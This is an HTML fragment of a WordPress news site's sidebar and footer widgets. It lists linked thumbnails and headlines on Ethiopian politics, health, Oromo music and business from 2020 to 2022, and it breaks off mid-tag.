									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/battlefield-ethiopia-new-dictator-for-life/" title="Battlefield Ethiopia- New Dictator for Life"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Dictator" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/00Ethiopia-Nobel-Gondar-mobileMasterAt3x-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/00Ethiopia-Nobel-Gondar-mobileMasterAt3x-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/00Ethiopia-Nobel-Gondar-mobileMasterAt3x-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/00Ethiopia-Nobel-Gondar-mobileMasterAt3x-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/00Ethiopia-Nobel-Gondar-mobileMasterAt3x-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Dictator" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/00Ethiopia-Nobel-Gondar-mobileMasterAt3x-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/00Ethiopia-Nobel-Gondar-mobileMasterAt3x-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/00Ethiopia-Nobel-Gondar-mobileMasterAt3x-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/battlefield-ethiopia-new-dictator-for-life/" title="Battlefield Ethiopia- New Dictator for Life">
										Battlefield Ethiopia- New Dictator for Life									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/03/">March 19, 2022</a></span>
</div>
							</div>
						</li>			</ul></div>	</aside>	</div>
    </div>
<footer class="mh-footer" itemscope="itemscope" itemtype="https://schema.org/WPFooter">
<div class="mh-container mh-container-inner mh-footer-widgets mh-row clearfix">
<div class="mh-col-1-4 mh-widget-col-1 mh-footer-4-cols  mh-footer-area mh-footer-1">
<div id="mh_magazine_custom_posts-16" class="mh-footer-widget mh_magazine_custom_posts"><h6 class="mh-widget-title mh-footer-widget-title"><span class="mh-widget-title-inner mh-footer-widget-title-inner"><a href="https://kichuu.com/category/health/" class="mh-widget-title-link">Health</a></span></h6>			<ul class="mh-custom-posts-widget clearfix"> 						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-113306 post type-post status-publish format-standard has-post-thumbnail category-health">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/shared-six-african-nations-to-get-mrna-vaccine-technology/" title="SHARED Six African nations to get mRNA vaccine technology"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Vaccine" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/02/06521a75-67a0-4508-b98c-9f2ab1dd7664-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/02/06521a75-67a0-4508-b98c-9f2ab1dd7664-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/02/06521a75-67a0-4508-b98c-9f2ab1dd7664-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/02/06521a75-67a0-4508-b98c-9f2ab1dd7664-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Vaccine" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/02/06521a75-67a0-4508-b98c-9f2ab1dd7664-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/02/06521a75-67a0-4508-b98c-9f2ab1dd7664-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/shared-six-african-nations-to-get-mrna-vaccine-technology/" title="SHARED Six African nations to get mRNA vaccine technology">
										SHARED Six African nations to get mRNA vaccine technology									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/02/">February 18, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-112286 post type-post status-publish format-standard has-post-thumbnail category-health">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/us-shares-additional-1680120-doses-of-pfizer-vaccine-with-ethiopia-january-28-2022/" title="US shares additional 1,680,120 doses of Pfizer vaccine with Ethiopia JANUARY 28, 2022"><picture class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" loading="lazy">
<source type="image/webp" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/US-COVAX-donation-1024x682-1-80x60.jpg.webp 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/US-COVAX-donation-1024x682-1-678x509.jpg.webp 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/US-COVAX-donation-1024x682-1-326x245.jpg.webp 326w" srcset="data:image/svg+xml,%3Csvg%20xmlns=&#039;http://www.w3.org/2000/svg&#039;%20viewBox=&#039;0%200%2080%2060&#039;%3E%3C/svg%3E" data-lazy-sizes="(max-width: 80px) 100vw, 80px"/>
<img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns=&#039;http://www.w3.org/2000/svg&#039;%20viewBox=&#039;0%200%2080%2060&#039;%3E%3C/svg%3E" alt="Pfizer vaccine" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/US-COVAX-donation-1024x682-1-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/US-COVAX-donation-1024x682-1-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/US-COVAX-donation-1024x682-1-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/US-COVAX-donation-1024x682-1-80x60.jpg"/>
</picture>
<noscript><picture class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" loading="lazy">
<source type="image/webp" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/US-COVAX-donation-1024x682-1-80x60.jpg.webp 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/US-COVAX-donation-1024x682-1-678x509.jpg.webp 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/US-COVAX-donation-1024x682-1-326x245.jpg.webp 326w" sizes="(max-width: 80px) 100vw, 80px"/>
<img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/US-COVAX-donation-1024x682-1-80x60.jpg" alt="Pfizer vaccine" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/US-COVAX-donation-1024x682-1-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/US-COVAX-donation-1024x682-1-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/US-COVAX-donation-1024x682-1-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px"/>
</picture>
</noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/us-shares-additional-1680120-doses-of-pfizer-vaccine-with-ethiopia-january-28-2022/" title="US shares additional 1,680,120 doses of Pfizer vaccine with Ethiopia JANUARY 28, 2022">
										US shares additional 1,680,120 doses of Pfizer vaccine with Ethiopia JANUARY 28, 2022									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/01/">January 28, 2022</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-112149 post type-post status-publish format-standard has-post-thumbnail category-health">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/who-chief-makes-case-for-2nd-term-as-ethiopia-criticizes-him/" title="WHO chief makes case for 2nd term as Ethiopia criticizes him"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="WHO chief" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/1200x0-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/1200x0-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/1200x0-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/1200x0-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/1200x0-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="WHO chief" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/1200x0-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/1200x0-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/01/1200x0-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/who-chief-makes-case-for-2nd-term-as-ethiopia-criticizes-him/" title="WHO chief makes case for 2nd term as Ethiopia criticizes him">
										WHO chief makes case for 2nd term as Ethiopia criticizes him									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2022/01/">January 25, 2022</a></span>
</div>
							</div>
						</li>			</ul></div></div>
<div class="mh-col-1-4 mh-widget-col-1 mh-footer-4-cols  mh-footer-area mh-footer-2">
<div id="mh_magazine_custom_posts-12" class="mh-footer-widget mh_magazine_custom_posts"><h6 class="mh-widget-title mh-footer-widget-title"><span class="mh-widget-title-inner mh-footer-widget-title-inner"><a href="https://kichuu.com/category/fun-videos/" class="mh-widget-title-link">Fun Videos</a></span></h6>			<ul class="mh-custom-posts-widget clearfix"> 						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-93264 post type-post status-publish format-standard has-post-thumbnail category-fun-videos">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/ola-defeated-endf-on-three-fronts-and-siezed-many-weapons-claims-by-ola/" title="OLA defeated ENDF on three fronts and Siezed many Weapons claims by OLA"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-e1620406409957.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-e1620406409957.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/05/pizap-72-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/ola-defeated-endf-on-three-fronts-and-siezed-many-weapons-claims-by-ola/" title="OLA defeated ENDF on three fronts and Siezed many Weapons claims by OLA">
										OLA defeated ENDF on three fronts and Siezed many Weapons claims by OLA									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/05/">May 7, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-86239 post type-post status-publish format-standard has-post-thumbnail category-fun-videos">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/gaafa-tokko-harreetu-waraabessaf-tola-olltefi-turte-kana-harreen/" title="Gaafa Tokko harreetu Waraabessaf Tola olltefi turte kana Harreen .."><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Harreen" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681.jpg 667w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Harreen" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681-326x245.jpg 326w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/01/pizap-70-e1610278501681.jpg 667w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/gaafa-tokko-harreetu-waraabessaf-tola-olltefi-turte-kana-harreen/" title="Gaafa Tokko harreetu Waraabessaf Tola olltefi turte kana Harreen ..">
										Gaafa Tokko harreetu Waraabessaf Tola olltefi turte kana Harreen ..									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/01/">January 10, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-75646 post type-post status-publish format-standard has-post-thumbnail category-fun-videos">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/isaias-isaiah-to-hit-america/" title="Isaias (Isaiah) to Hit America!"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Isaias" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2020/08/116815866_1346726828853241_1762356899848592848_o-scaled-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2020/08/116815866_1346726828853241_1762356899848592848_o-scaled-324x245.jpg 324w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2020/08/116815866_1346726828853241_1762356899848592848_o-scaled-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2020/08/116815866_1346726828853241_1762356899848592848_o-scaled-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Isaias" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2020/08/116815866_1346726828853241_1762356899848592848_o-scaled-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2020/08/116815866_1346726828853241_1762356899848592848_o-scaled-324x245.jpg 324w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/isaias-isaiah-to-hit-america/" title="Isaias (Isaiah) to Hit America!">
										Isaias (Isaiah) to Hit America!									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2020/08/">August 1, 2020</a></span>
</div>
							</div>
						</li>			</ul></div></div>
<div class="mh-col-1-4 mh-widget-col-1 mh-footer-4-cols  mh-footer-area mh-footer-3">
<div id="mh_magazine_custom_posts-13" class="mh-footer-widget mh_magazine_custom_posts"><h6 class="mh-widget-title mh-footer-widget-title"><span class="mh-widget-title-inner mh-footer-widget-title-inner"><a href="https://kichuu.com/category/musics/" class="mh-widget-title-link">Musics</a></span></h6>			<ul class="mh-custom-posts-widget clearfix"> 						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-107951 post type-post status-publish format-standard has-post-thumbnail category-musics">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/galana-garomsa-duuba-iccitiin-dhugaa-jiru-kunooti-girma-gutama-wbotti-dabalamuu-odeeffannoo/" title="Galana Garomsa Duuba iccitiin Dhugaa Jiru Kunooti &#8211; Girma Gutama WBOtti Dabalamuu -Odeeffannoo "><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Galana Garomsa" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/Untitled-21-80x60.png 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/Untitled-21-326x245.png 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/Untitled-21-80x60.png" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/Untitled-21-80x60.png" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Galana Garomsa" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/Untitled-21-80x60.png 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/Untitled-21-326x245.png 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/galana-garomsa-duuba-iccitiin-dhugaa-jiru-kunooti-girma-gutama-wbotti-dabalamuu-odeeffannoo/" title="Galana Garomsa Duuba iccitiin Dhugaa Jiru Kunooti &#8211; Girma Gutama WBOtti Dabalamuu -Odeeffannoo ">
										Galana Garomsa Duuba iccitiin Dhugaa Jiru Kunooti &#8211; Girma Gutama WBOtti Dabalamuu -Odeeffannoo 									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/10/">October 30, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-107194 post type-post status-publish format-standard has-post-thumbnail category-musics">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/amin-hussenb-b-reebii-loli-new-oromo-music-october-122021/" title="Amin Hussen(B.B) REEBII LOLI New Oromo Music October 12,2021"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Oromo Music" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/pizap33-1-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/pizap33-1-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/pizap33-1-e1634131103497.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/pizap33-1-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/pizap33-1-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/pizap33-1-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/pizap33-1-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/pizap33-1-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Oromo Music" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/pizap33-1-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/pizap33-1-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/pizap33-1-e1634131103497.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/pizap33-1-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/pizap33-1-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/10/pizap33-1-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/amin-hussenb-b-reebii-loli-new-oromo-music-october-122021/" title="Amin Hussen(B.B) REEBII LOLI New Oromo Music October 12,2021">
										Amin Hussen(B.B) REEBII LOLI New Oromo Music October 12,2021									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/10/">October 13, 2021</a></span>
</div>
							</div>
						</li>						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-104561 post type-post status-publish format-standard has-post-thumbnail category-musics">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/artistoota-oromoo-fi-icciitii-isaanii/" title="Artistoota Oromoo fi  icciitii isaanii!!"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Artistoota Oromoo" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap35-1-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap35-1-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap35-1-e1631973911181.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap35-1-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap35-1-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap35-1-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap35-1-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap35-1-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Artistoota Oromoo" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap35-1-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap35-1-300x225.jpg 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap35-1-e1631973911181.jpg 700w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap35-1-768x576.jpg 768w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap35-1-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2021/09/pizap35-1-326x245.jpg 326w" sizes="(max-width: 80px) 100vw, 80px" /></noscript>									</a>
								</figure>
														<div class="mh-custom-posts-header">
								<div class="mh-custom-posts-small-title">
									<a href="https://kichuu.com/artistoota-oromoo-fi-icciitii-isaanii/" title="Artistoota Oromoo fi  icciitii isaanii!!">
										Artistoota Oromoo fi  icciitii isaanii!!									</a>
								</div>
								<div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/09/">September 18, 2021</a></span>
</div>
							</div>
						</li>			</ul></div></div>
<div class="mh-col-1-4 mh-widget-col-1 mh-footer-4-cols  mh-footer-area mh-footer-4">
<div id="mh_magazine_custom_posts-14" class="mh-footer-widget mh_magazine_custom_posts"><h6 class="mh-widget-title mh-footer-widget-title"><span class="mh-widget-title-inner mh-footer-widget-title-inner"><a href="https://kichuu.com/category/business/" class="mh-widget-title-link">Business</a></span></h6>			<ul class="mh-custom-posts-widget clearfix"> 						<li class="mh-custom-posts-item mh-custom-posts-small clearfix post-114468 post type-post status-publish format-standard has-post-thumbnail category-business">
															<figure class="mh-custom-posts-thumb">
									<a class="mh-thumb-icon mh-thumb-icon-small" href="https://kichuu.com/ethiopia-suspends-sale-of-telecom-firms-stake-sought-by-orange/" title="Ethiopia Suspends Sale of Telecom Firm’s Stake Sought by Orange"><img width="80" height="60" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2080%2060'%3E%3C/svg%3E" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Telecom" loading="lazy" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/1200x849-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/1200x849-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/1200x849-326x245.jpg 326w" data-lazy-sizes="(max-width: 80px) 100vw, 80px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/1200x849-80x60.jpg" /><noscript><img width="80" height="60" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/1200x849-80x60.jpg" class="attachment-mh-magazine-small size-mh-magazine-small wp-post-image" alt="Telecom" loading="lazy" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/1200x849-80x60.jpg 80w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/1200x849-678x509.jpg 678w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2022/03/1200x849-326x245.jpg 326w" 